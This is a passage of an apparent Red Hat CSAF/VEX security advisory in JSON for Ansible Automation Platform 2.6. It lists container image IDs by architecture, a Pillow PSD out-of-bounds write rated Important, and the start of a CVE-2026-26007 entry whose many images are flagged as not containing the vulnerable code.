"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "pillow: Pillow: Out-of-bounds Write via Specially Crafted PSD Image"
},
{
"cve": "CVE-2026-26007",
"cwe": {
"id": "CWE-354",
"name": "Improper Validation of Integrity Check Value"
},
"discovery_date": "2026-02-10T22:01:01.036116+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
